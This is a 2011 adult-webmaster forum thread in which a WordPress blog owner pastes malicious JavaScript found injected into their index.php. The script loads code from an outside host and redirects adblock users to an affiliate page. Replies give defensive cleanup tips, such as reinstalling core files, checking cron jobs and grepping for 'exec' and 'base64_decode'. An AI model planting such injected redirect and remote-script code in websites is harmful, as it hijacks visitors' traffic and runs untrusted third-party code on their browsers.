GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   PHP Injection?!?! http://valueaffiliate.net/abp (https://gfy.com/showthread.php?t=1040353)

Telly 10-03-2011 04:56 PM
PHP Injection?!?! http://valueaffiliate.net/abp
 
I discovered a hack on my personal blog that I think might be of interest to all of us. When browsing hawaiipornblog.com with Firefox and adblock turned on I was redirected to http://valueaffiliate.net/abp

It appears that this is some kind of cloaking injection on the index.php:
<script type="text/javascript">var isloaded = false;</script><script type="text/javascript" src="http://valueaffiliate.net/overlay_gateway.php?pub=152855&gateid=MTk4NDkx"></script><script type="text/javascript">if (!isloaded) { window.location = 'http://valueaffiliate.net/abp'; }</script><noscript><meta http-equiv="refresh" content="0;url=http://valueaffiliate.net/java" /></noscript>

Has anyone had a similar problem? I've commented it out but am unsure as to what it's doing other than redirecting adblock traffic. Your help would be appreciated!

Telly

AzteK 10-03-2011 04:57 PM
ugh my antivirus just blocked this

SASCH 10-03-2011 04:58 PM
You using WordPress?

Telly 10-03-2011 05:13 PM
Quote:
Originally Posted by SASCH (Post 18467104)
You using WordPress?
Yup I'm on wordpress and am upgraded to the latest version, though I don't know how long that script has been on my site. What I do know is that sales took a dive for the past month so I can only guess it's been since then.

fris 10-03-2011 06:01 PM
Quote:
Originally Posted by Telly (Post 18467130)
Yup I'm on wordpress and am upgraded to the latest version, though I don't know how long that script has been on my site. What I do know is that sales took a dive for the past month so I can only guess it's been since then.
download the zip from wordpress.org reupload the files which will replace all the core files. if the problem still is there, have a look at your theme code, mostly functions.php footer.php and header.php

or hit me up if you need help.

Telly 10-03-2011 10:36 PM
Quote:
Originally Posted by fris (Post 18467191)
download the zip from wordpress.org reupload the files which will replace all the core files. if the problem still is there, have a look at your theme code, mostly functions.php footer.php and header.php

or hit me up if you need help.
Thank you!

Mr Pheer 10-03-2011 10:39 PM
I'd like to kill the fuckin assholes that do this type of shit.

Telly 10-04-2011 12:16 PM
Quote:
Originally Posted by Mr Pheer (Post 18467594)
I'd like to kill the fuckin assholes that do this type of shit.
heh "like"

scouser 10-05-2011 05:25 AM
do a search for things like 'exec' or 'base64_decode'

ie
grep -r 'exec' ./
in ur root dir.

anything that has that and things like base64_decode() is often a hacked script. sometimes searching for file_get_contents or curl() will find stuff too. if it is all grouped together and not clear/tidy code make sure to give it a good look and work out what its doing.

iSpyCams 10-05-2011 06:40 AM
a while back I had an infection and the bastards made a chron job on my server that kept reinstalling it every day. So check your chron jobs too.

Brujah 10-05-2011 06:42 AM
You may also need to clear any cache folders, like supercache, etc..

seeandsee 10-05-2011 06:50 AM
problem is how you got hacked, is it host, is it ftp, is it script...

vdbucks 10-05-2011 06:51 AM
Quote:
Originally Posted by deadmoon (Post 18470432)
do a search for things like 'exec' or 'base64_decode'

ie
grep -r 'exec' ./
in ur root dir.

anything that has that and things like base64_decode() is often a hacked script. sometimes searching for file_get_contents or curl() will find stuff too. if it is all grouped together and not clear/tidy code make sure to give it a good look and work out what its doing.
xargs is faster ^^

for example... cd to blog root directory then

find . | xargs grep 'exec'

fris 10-05-2011 08:02 AM
shared hosting sucks for wordpress, because if someone else on the server has an insecure script then they can get access to any site on the shared server.

this is why i always have a decicated and im the only one with access so that way if something happens i can only blame myself.


All times are GMT -7. The time now is 03:55 PM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc